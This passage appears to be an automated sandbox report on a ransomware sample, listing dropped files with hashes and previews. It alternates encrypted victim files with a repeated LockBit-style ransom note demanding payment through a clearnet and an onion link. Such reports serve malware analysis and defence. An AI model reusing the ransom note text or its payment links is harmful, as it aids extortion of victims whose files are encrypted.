                                                                                                          Preview:..:...{d..M....p.NB....o.N....f......i.OYz..Gi b='93+....;I...,..Ttn......s.R.....t>.!E.x..Yl..4.s..7.-Yj_d.N..:....1ubO...Sy../>............]&Q..yB......@[.....g.F.t.....`.......&...&...L~.+6T..C.....$...\..Ln..!.cg_.r.z.4.4........s.Z. ..Uv...; ..d.-......Y]+.....k5M}].._.q...g|j5.tS:s..}....`]._.j+...,..-.0..}m<...%|.kQ.....l..<J..........I.Y ...4.?..h..1..kH.{.V..5z..@.....Z.g..C.&sA....$Q....{$.;...7..:...Lb...KS.......`.......X\B.U.0.}.Wc...E.Fr...+.M3G.n.h..s...$S.....1$....w..&..........@.....+..".S...o.Q....6..'.W.cr..8.......8..Y0..if.*.i....Fv.`...i..jT1..Q.]...x...N..SI.t19X.HG.N.....!.yCK...Q.B+"..MF......Y..O...bq..K....../....^....C..4.....k..<..s.-P...Z.C;..[.o.v-d....a.I1..8..:..=.........).&U.qt..n..].! fN...}p".-..B..bQo....T.'..DM......S<.KA`..%..|.N.ks....+.~`#./.m.5^......~]f.W.p.P...|z(./0...O..........eZ....z.TS...l..|...!....3v.` ob..Q...e......k.K..IR..n.o6y......\.`.Ne+.....5...l..?....H./)...2..4..E.qB.^..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):39168
                                                                                                          Entropy (8bit):7.995583094816277
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:Pj2Wx9oiypR3nShEta2Uyn8g3PLWSAjOqhtlxy/j65k9mfoZ:bsihEDiVKqhtlx/69UoZ
                                                                                                          MD5:27B7F3C4E0B31B504E0CEDE2457C559D
                                                                                                          SHA1:0BE9D181F3C4C4DC84FD64315A9F1E06D57E557E
                                                                                                          SHA-256:F153D48876D5E669825A0CBBC57A61C5DD80F310FC77196FE59A4AF8148421D0
                                                                                                          SHA-512:A84F22D9CF53234B9446E0AE883523F678839556A98AFF1DEDD0DF771EC78F0F8B4EB2E649F55DC7D496A7AB8746B19C316BAE83942C80BFD230CEB821337A9E
                                                                                                          Malicious:true
                                                                                                          Preview:}..R....c..Z.Y...E.....I.._6.|..m9a.>.Wi....^6i.*.......G.p./.,...&..Wv.p.^..:\.... z{.*............Y..j..2..V..am..;gh.t<.e..:.T..|/F%%...Ab&.z%A&...wj......o..v@%v3..c...E{....l.6.U.+.(.......x.;..1..x.2.HBi...lq...QLw.......NKT...S....N.dEP.....i. L@...}.(..3....%...:...Q.K..d..w. W..a^.-.}.d.P...._.d."`...e...R.m..........(b).BF.&...}*3}k..nC.......p......$.......,.w...C.l>7T.b.v..WK7B.)q.0..-...ap.S.q.'....M..22./.r.".i.t...L...nh..=..5....?g.2Zw:"...S..;...X..\+....p......BEK..1.h(...?.M.C..Ni..b...f......{..?Q)......od".....6Z<.[.4.&'..n.f.}....2..#.P.N.{....u......E.}...a.Vd....9d..`......jZ..dF.%..N....Tv...0..H..mJ...2.i.p-....`\. Z...t`.l..X..^$c...x..3(..X...1...~f.n 7kY..'2Y...P...E....4'.......i.8|..A.HS.[..(l)%...eGN8.q..z2.k..<......`>./....x...Lwm..G..r....p.X.}...z....l.V.....P.jZ.>...d5I...V)u=#.]6L..r@.*.....~....q.l.#..u:.G.+...{y.C.:..~H....5.....f.:YQ.&".B...;...Kr-\...j.. ..]...G.u.a..6^.z.c...6...j.i;.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36528
                                                                                                          Entropy (8bit):7.994364071071281
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:J/BBdpkeoLOxdR71XvUg7t1354kx4KH2IlmxeHdztcZ:1fdpgL8dL/F7r5JxRZUsDcZ
                                                                                                          MD5:C3D744C5B665CF8BF00230FDE82113EA
                                                                                                          SHA1:3D97147FC26299F8CD46C67233EF046F243BB115
                                                                                                          SHA-256:22A8485FD5E8D9ADA25D036828D18CBD9C22B0C6E5AED9F8D3F9A74D7145952C
                                                                                                          SHA-512:0B8A2193C2B18680010D3F714AC942362BFBAB88F65886DD34774474F40DF37D7044FDF401AF30A9BDA7273C3D389329BB6A6900538F4A31C33127D04326D7EC
                                                                                                          Malicious:true
                                                                                                          Preview:[....!.....X.d.] .Pl.7....+....O.L.498S.s...'.54..(zNpu1..K...3.e.0A...E......ZE...r?.....h2Wp...8.~..J........S..MF....D.u.sdn...E.).F..-.t.d`. ...a.).......kQ....V..>.$h.i."...lh..#z&J.........r.E.K.U...b..&.w.e].i..S.J..>.3A.xJ#.w.S.h...-..W.!....R.\.........N.T.@..m..aLs.vmb?.......jwI.1U#b..m.F".....q........M[L).7.q(..>B.1d..1a.......YED...tdE.[*..R9,...m.Q=f....1...t4...o/`Y}...jT..aR*....Hi......].vF.,....4..g.o}.~g.b.Z....]..1..ZV..Ej.....%.g.9...P6s0....o{.:..x.b.A..2....c..o...NV.....w..f9.r.~..9:..11S'....mHr7...........a.<.I.5.....dr..}..../.......f.@...$wr*.`.Vx5o..>e.2......./.x4......qx-Y.-.y..~...O=?.s&o_>.?..h.|........m.V.!..+.Yy,.S...P.p'..3u.rv...'.{.S.\..O.I;.,r/P:D@...L.>..hN]cs.$..=.......&Qv`JEN..>....Dz%........2G.x.....q..2.5..l......=.!..............D.R...4.....6..c......l1...T ...k.J...o..d.UG.&$.,...g.7....../...2..@....%P...Y.....{.Z.cU...V*.Y...MJ@..C7.....S;F|x.Tl*m ..'E.}]..Sx7..,.r....J....S. _aWw.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30032
                                                                                                          Entropy (8bit):7.993967787753307
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ePUSiV0LQIiCEwUtHQxoe8qNI7hFnwOrZ:eQs0wCe8xjhZ
                                                                                                          MD5:77A74724D486A12B8CAB4CF200F0753D
                                                                                                          SHA1:214F3A982E530CA9713F0AF376D7491695ECF407
                                                                                                          SHA-256:928A538ADFB46858575C3994CC1DE8F4D93F455CECC266CFE76D839285D150B0
                                                                                                          SHA-512:E748170064E01CD3B3C9BFEA3FD71439E95B4558B1FF0C1341B60E664711B1F696D686A85EC2C95CBCB69898B79B836F3486BD93D5EBDE646DBFEB5F4CB42106
                                                                                                          Malicious:true
                                                                                                          Preview:....A.....q...B7....*...2..\?1Y.dd.B&"....X..WMn&a..].yw.........A.&./.......j...D........S../Oz...Q^.{./>......U.X?\.......&."v|."..~..../.%^7.\.5;:VZ....Z..6..R..w.J..Y..;M@.L'e.T..E*.][>./.uN.^k......h......XM...3.CK.Z...\..H...T_{d8EP.7{..L...m....1......t.DP.n>O..V5/..a..`..!.o.q@...#Uf..u...!.F./....'.3.............'/3`....u...mV..l.......9..Y..........i.1v.....E.u%...O.d.....,.V...a.Q~<@....\B..w^..T<....u...G&.V...>Q....V.....V.r$W.iI.J..~...w+.N..7-.'.!\|'...rB...tX....?F...h...#....a..f..pi&:....S....vs/..1Y....d..]....G...d.0........+Z.$...8.q.rq/.|..(w.e.?.zM..}!X...7.E..H~..uC....fY|...A...X._.q;.=.(N.{.....W/U....)v?..B.h.g...........N..."1.....i......6l'..L_....0....lA.A'i...>.#..E^.!...r,.M.]..2...}...zt...'.c.....@.(...r..d.ej..rb...1...q.~.....M.M.G...L..ii01....DZ..H.*Fb..}c-...uV...N9...>.P.(.q...u)..I..z..B.....t.6..EOE......S.f5.oBG..e.. ....%.$...h...T.s..i..z.0|...8.z..a.H........Y.. I....}dQ......].
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32064
                                                                                                          Entropy (8bit):7.994854881809921
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:WiifCCm3cN3D9UgfvazRv/G/sXxN6O3d/N1lZ:yflmQUg3aMsN95PlZ
                                                                                                          MD5:F061650A70A932FF3028819D6D5C0A9F
                                                                                                          SHA1:1646CA83200DDB8D80C9B5D9A03E02A0147C5D73
                                                                                                          SHA-256:5B33FDCB74AA37E6EE06C128B0C44FBAF4797367874009301F3E7EC430DD0101
                                                                                                          SHA-512:999E16745928BCF72CD43B8FC8A7B061D7723E9E262D19A2BAC89C9F06288E5BE33204781489CFFED8364709CFCE759D9A90B116F1A449E1A5006399A3FF1E6E
                                                                                                          Malicious:true
                                                                                                          Preview:..\../.su.$8..)5..o..O..c..1p}..Bf.aYm5c4..e....b..-[.7....t.g.o@$r..q.*...=.....6..".J.).G2e..E. ...N..6g.h..2...!-E.Z..P.S....r...0H..v...,.u.&..0Co.X........rWG.Bu9."u..F.. ...|....W..*`....D....K9y..u..Ex.?...ea.Dt.{.9.aC.9......ZY!I.}F....N.d.YU...6.J.5.Y.}.....Sp...#g.y.X1.o...+....7.9n.mI.Y.....1. .V.E......Y.c..[g$..o.+).P)sMG.m....[........3..y]7..g..9Z.+G...1k...Ux.j.[..5..@....\TB.CLH.$U.j.b^......>.L5...........Q.....`.......1 VfO..g.$5.k.O...p.. .K..F..u....zX...H... BW.+..D..\g..[.g.-.d{c"V.Y..HeS.w...Pz?d....Jo....5Vs..S>'d..U...z.....,>..~.f.:N.`._.(t.9.}/-...:......6.\]....??....i5.{...mp2..o.n.a.[.Y..oG....h.z1$f.R...O.T.....B.@..c.!.....?....W..W...4.fG.B!.s.Cx........h.:.tV.c...@.;$.m.N...+....O..94..#..!.;/.^......}.e....V*}.\.F.1C......".SS..:..K.s.....*o.:.g2..)..i.7..0N...m.?...O.k<.. ....b...}..d..d....+.5.s.#"I:.....q(l...r_.,...$......O4....oNt...RH.?5..7..=....f`b.s.*.{.V..#.......?.....SP.lf...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36896
                                                                                                          Entropy (8bit):7.995138142822725
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:4/taR46169tFcTnyn8cSuRSHJH6wi7KN1Dacc0ukFi3+Z:6R269cuSHchKTDPcuFK+Z
                                                                                                          MD5:2BEEAC5951AFBBBE2233262BDF1D8D56
                                                                                                          SHA1:055E8C6DA7C5BC9367CE279577F0E023353AB191
                                                                                                          SHA-256:66A1FE9143AD8B922248134747E684BFA2E90C6E7A5EB4A859BF950EDDABD772
                                                                                                          SHA-512:10506503F8CBB2C9CEE2D566749FB87E65A712202E371729000BBA1DB040FB31A1DF6D3474DC082D421E89441A66989368D209AADEF317BAA4F4D82DA6FA7014
                                                                                                          Malicious:true
                                                                                                          Preview:s....D#...N..q.}..c..I....P.a)C.4..............HP..,...L...T{]8K\.%..Jl..%.l....._(7..T...O..9...g'...q.r?..,":..R,.a.S...u...)-.../..=.......~|.n..z.R...."..... <..Nl...%.Umh...xY].......=...L..C...9.!3].P.}...&6.FG........!...._......"L..AX./.P[M.84H.......([.....g..,......u.w88...>.."O..#h.AS.K.....2-`..z>.x~U..xN.0;3.....[.....Qk:.oW...8..C..-P#.._r~J.L..Z.|...YW5...V(6?....Ujf.^...fU.....2+Hf.E...X.0...-..Axg.!.`C..mM....?.....M..".$....San..;U6Sy.v.`......\.]0...J\........c..e.9..~z.8.6.(.o,.#.Go_.....S.g..L.I.O.5=s[.....j~.El$^6M;..P./^..:..d../..[.AW.....N.....p.;.y.h..m..x.y.F>...J......&;..2.m....A%.jq...."P6G..?.e.....2.@...&.h......>$...K...6..~..F.........R..F........Gc....l=.D...>......a...m...dI$..y...:iL.......S....r....ttA[.....Thz.#.f..#.p.s....qg..s...a..4..X....Q....f..l....p0+..[.U...2...C.......\5.@...ml.>.j.X...k.A..Q{....).......^.(hj"......"/...Q.."..R...9.q.j..g..J7j..`....'.\..7K......7.P.$V..b..4
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31712
                                                                                                          Entropy (8bit):7.994260143025632
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:FHfepDvbmyICqD3dWnZW0saazuVnaoaYr7sX7KRvXvUhL8ycrZFZ:NGdbGN7dCZezCq+5/UhYycHZ
                                                                                                          MD5:131B1FD78829CBFA436156F1E2395C08
                                                                                                          SHA1:91E9F05B49361C446B77F87090703920F258804C
                                                                                                          SHA-256:8CD3B104AA928B24DC886270C77A38DFBF5567DE1348BD965EB9EC3DA8ADD580
                                                                                                          SHA-512:C47E22FC90D2513BB239496EE93C82FDA39800363C3F2ED1B24D41A663E3E7A1C7AE18784B29627011F886080CCC3B8C82BECF1C0C459569281E00C4EF21434F
                                                                                                          Malicious:true
                                                                                                          Preview:s.q....s..(..+......,@ =.8......_\s.......Eb.J...d.t8..$+......I.9..T1...t.P..S...%..?.......ay.l.]....../..:..?.X_.......`.R..*/v.....'(..]ha......Z.c:...{Vc..%.......R......J..(,....G.........7..\t$..{..1..Z,.w..6~L...<.!.. ..x..O4...{C.E5...kbc.k .....I.."..YD,z..-..<......3..=.....y"F......$.J.....F...'v%.P...t.....L...<....1......C.ho]......&b..E....t..X5...$.......c.G.f..l.$BIi..#.Q.d...`F.ZI.......p..5..Z...{.M5(I.Q...4J/...QtvS..Z...n<t+Q...%.......e.I..&...H...hn.gY.z.yu.(.. ..}...........6.&..M.pnlS....Q.p......+f.L...q..r..e)D...e9..j.|n.9..;.V##..Z..?.Pv.|Mb..Br\.}z.e.Z.......Z.70...[J.j.1.Ny...Y.u.......)=.[.b.\vd{..O..l!...*(T.*e.t...B*.=....[.....c]..3........4..?.~..b..6..OG..pOg.F.sj.z.t%r......<.....K.......[..v.._2U..8bl.y...:.H....lS........&..n......3...,K.\f...k...[.....Ur..(.....w...qJ..G.....x...]. ..;w..4t9u...T.$*`........U...jn..0...c..\..2X.L..fg5....yx.....9t.?.]`*.".........G..`"..Dt.........@....J.m...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):62224
                                                                                                          Entropy (8bit):7.997065049598067
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:CsqtPizPXnLGfb5Byacmcdc5YqNlaBrIwRqtvyYvLgpoaSpZ:Bz/nLgbmIcaNNl8rIwRqtDvSIZ
                                                                                                          MD5:F2B356F60A72B7C822B232C13EC0CBBF
                                                                                                          SHA1:DB894B6B64847808F15F2B34F2DB8917CACE9F69
                                                                                                          SHA-256:6447F9E7533D1D74E2E64E3B090B33EED862B336A4172FD43D95909E5E22F403
                                                                                                          SHA-512:41AAAAACFA957FE0C85D99F3EC29351A0D56804AEA167B3BE6E90E6ED518D8DB1DE274D23F1F1DAC1CCD060A8F0D587E4704D818B902628857CDC50AEF69066D
                                                                                                          Malicious:true
                                                                                                          Preview:5...X&.s>..q.....b.....'H...-....Z.Z...\ir7U!s...%bs7...0.X..&t.\..j.~..<5+.6.r"P].`..%...kx..H.d.<8..<..D..|.sy.CZX..&I..l....W.>.0.c.gb....,....$.5en}k7.zv.. .a...... ..5....'./$..0.....W..9..<P?.Y...+..`.... ...>=3......f..$....?.s.SY...C.A.t..*p.~]....W.@......P...t.<<.n...I.)Qf{..l..l.c8.R...K.;OhR..gQZ...v..P.g.........I...f..0..96V(.S2.y..Yr...k.:4G...J6{Q....-......j....D /.,....+[.F.Y.......)f......m#.aQ..YBd[GG.o%C..f...c.+.%H..y..u..0.....R..*.....s0.r]6.-....P.Xo#jpj.2...P....U.}..@...DT..#.P....9.....h....i.G.^OXY......^}.g[.b......Y.!xB".wG.m..k.t....:.......;1j.....l0.K.f....nr.n....n....dO.......G.+.3S...{o5...s&..y...E.Bt..'5*.K..\{a.eT..c..<..4.?j..CdK.....B..4...o..4..j2..a{.0Af.....j.<.=....i#.="...\y.0 b-3...T%*....P.{..;.I.S$.a.t.}.9..o..b...PM9...EMj.N...".....\1i.5.#..b.wQ...q<].|_(..P.[.F.ZtF.:8....y.X...Pf.....z$j..+...0s\..>._.4b..L...1n...F.E..V,.[..+{.......e..Lo..T......N..........KZ..p.f.c......t..r'..@.6..xf.k.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
